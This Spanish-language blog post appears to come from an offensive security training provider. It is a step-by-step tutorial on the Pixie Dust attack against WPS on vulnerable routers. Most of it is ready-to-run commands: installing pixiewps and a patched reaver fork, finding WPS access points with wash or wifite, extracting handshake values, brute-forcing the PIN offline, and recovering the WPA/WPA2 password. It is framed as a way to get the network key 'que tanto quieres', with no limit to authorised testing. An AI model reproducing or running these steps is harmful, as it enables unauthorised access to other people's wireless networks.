Gracias a la reciente investigación de Dominique Bongard, ahora es posible romper el famoso WPS (Wi-Fi Protected Setup), que tradicionalmente se ha tardado desde 2 horas hasta 12 o más horas en arrojarnos la clave de redes WPA o WPA2…. para pasar a romper WPS en solo segundos, realizando un ataque de fuerza bruta de forma offline denominado «ataque de polvo de hadas» o Pixie Dust Attack.

Lo que Dominique ha descubierto e hizo publico en la pasada versión de la conferencia Hacklu2014 en Luxemburgo, es que algunas marcas de routers, en especial sus chipsets (aquí el listado completo de fabricantes vulnerable, que se actualiza constantemente con reportes de los usuarios), tienen un problema en el generador de números aleatorios que utilizan entropia muy baja y permite adivinar este numero usado como semilla en el algoritmo por fuerza bruta.

Aunque el Suizo no publicó su investigación con una herramienta para explotar el fallo, los detalles técnicos que ha expuesto en su charla (ver vídeo de la charla) han sido tan específicos, que existen ya varias herramientas que nos permiten realizar el ataque Pixie Dust, siendo la más popular hasta el momento la herramienta generada por el usuario del foro de Kali Linux llamada pixiewps.

Rompiendo redes Inalámbricas WPA o WPA2 con WPS en segundos

Después de instalar las dependencias de la herramienta

sudo apt-get install libssl-dev

Descargargamo y compilamos el código

~/pixiewps$ cd src<br />~/pixiewps/src$ make<br />~/pixiewps/src$ sudo make install

Tenemos el pixiewps listo, pero para poder sacar los datos que necesita como parámetros para trabajar, necesitamos saber ciertos datos del objetivo, que podemos sacar con wash para ver los APs con WPS activo…

wash -i interfaceModoMonitor

o usar un script como wifite con el parámetro -wps para identificar la mac y el canal de los AP que tengan WPS

wifite -wps

Luego debemos pasar el canal y la mac de la red a auditar como parámetro a una versión de reaver modificada para solo lectura

apt-get install libpcap-dev aircrack-ng sqlite3 libsqlite3-dev<br />wget https://github.com/t6x/reaver-wps-fork-t6x/archive/master.zip -O reaver.zip<br />unzip reaver.zip<br />cd reaver-wps-fork-t6x-master/src/<br />chmod 777 ./configure<br />./configure<br />make<br />sudo make install

Corremos el reaver modificado con los siguientes parámetros

reaver -i INTERFACEMODOMONITOR -c CANAL -b MACROUTEROBJETIVO -vv -S

Finalmente con los datos que nos ha arrojado el reaver, le pasamos los siguientes parámetros al pixiewps

pixiewps -e numeroPKE -s numeroE-Hash1 -z numeroE-Hash2 -a numeroAuthKey -S

Si todo sale bien y el objetivo hace parte de los dispositivos con el problema te saldrá el PIN como resultado en pantalla.

Solo debes meter ese pin como parámetro de nuevo al reaver, para que usando el PIN solicite la clave de la red WPA o WPA2

reaver -i wlan1mon -c CANAL -b MACROUTEROBJETIVO -vv -S --pin=AQUIPIN

Lo que te arrojaría en pantalla la clave WPA o WPA2 que tanto quieres.

Como era de esperarse con pasos tan simples era cuestión de tiempo para que alguien se aventurara a generar un script de automatización del proceso, y eso fué lo que hizo alegoria51 o como se autodenomina dentro del script «5.1» de la comunidad SeguridadWireless, quien automatizó totalmente en español el proceso del pixiewps con un instalador que instala las dependencias y el parchea el reaver para que nos arroje los datos en modo read only, ademas de añadir funcionalidades como verificar si la mac del objetivo es compatible o no con el ataque y en la ultima versión puso todo con una agradable versión gráfica.

Pueden descargarlo del repositorio oficial en SourceForge

RECOMENDACIONES: Poner tiempos de espera altos, muchas veces la detección de las redes con WPS tarda un poco más de lo normal, por lo que debes dejar trabajar las herramientas por lo menos como mínimo 3 minutos en la etapa de enumeración.

Para ejecutar el PixieScript es recomendable usarlo bajo la distribución WifiSlax, donde funciona sin ningún problema, en Kali y otras tendremos que resolver a mano varios inconvenientes que no resuelve su «INSTALADOR».

Espero que te sea de utilidad esta herramienta, ya la hemos probado sobre diferentes objetivos en el laboratorio con resultados más que satisfactorios y ha sido integrada a los procesos de nuestro diplomado de seguridad informática ofensiva, que siempre se actualiza con nuevas técnicas como esta.